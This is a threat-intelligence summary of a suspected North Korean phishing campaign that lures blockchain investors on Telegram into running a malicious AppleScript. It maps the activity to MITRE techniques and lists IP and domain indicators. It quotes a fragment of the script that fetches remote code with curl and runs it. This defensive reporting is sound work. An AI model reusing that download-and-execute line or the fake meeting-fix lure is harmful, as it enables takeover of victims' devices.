Threat Research

North Korean Hackers Phish Blockchain via Telegram

Securonix

Hunt tracks an ongoing sophisticated phishing campaign targeting Telegram groups in the blockchain and angel-investing communities, with actors posing as investment-representatives to lure victims into downloading a malicious Apple Script. The activity shows Lazarus Group–like patterns and infrastructure, though attribution remains unconfirmed. #LazarusGroup #SignumCapital #Telegram #AppleScript

Keypoints

  • The campaign targets blockchain and angel-investing entrepreneurs on Telegram, using social engineering to build trust.
  • Attackers impersonate a venture-capital representative (false Telegram profile) to initiate contact and schedule discussions.
  • Victims are guided to download a malicious Apple Script after a supposed meeting accessibility issue is raised.
  • The Apple Script downloads and executes malicious payloads via shell commands, enabling device compromise.

MITRE Techniques

  • [T1566.003] Spearphishing via Service – The attacker contacts victims through Telegram, posing as an investor to initiate a meeting. Quote: “communication begins with the actor posing as a representative of an investment company seeking business opportunities.”
  • [T1036] Masquerading – The attacker creates a false Telegram profile posing as a “GP” or general partner of the firm to discuss collaboration. Quote: “the attacker(s) created a false Telegram profile posing as a “GP” or general partner of the firm looking to discuss a potential project to collaborate on with the victim.”
  • [T1059.004] Unix Shell – The Apple Script uses shell commands to download and run a script (do shell script “curl -L -k …” run script sc). Quote: “# Troubleshoot the issue set fix_url to …” set sc to do shell script “curl -L -k “” & fix_url & “””” run script sc.”
  • [T1204.002] User Execution – The victim is coaxed into downloading an Apple Script thought to fix access; the script is malicious. Quote: “The script, however, is malicious and designed to allow the hackers to compromise the victim’s device.”
  • [T1105] Ingress Tool Transfer – The malicious script downloaded from a remote URL is used to gain control of the victim’s device. Quote: “The script, however, is malicious and designed to allow the hackers to compromise the victim’s device.”

Indicators of Compromise

  • [IP Address] context – 104.168.163.149, 104.168.137.21, 104.168.163.124, 23.254.129.6 – these addresses host related domains observed in the campaign infrastructure (e.g., support.internal-meeting.site, meet.cryptowave.capital).
  • [Domain] context – support.internal-meeting.site, meet.cryptowave.capital – domains associated with the campaign’s phishing infrastructure and TLS-history exploration (IPs above).

Read more: https://hunt.io/blog/suspected-north-korean-hackers-target-blockchain-community-via-telegram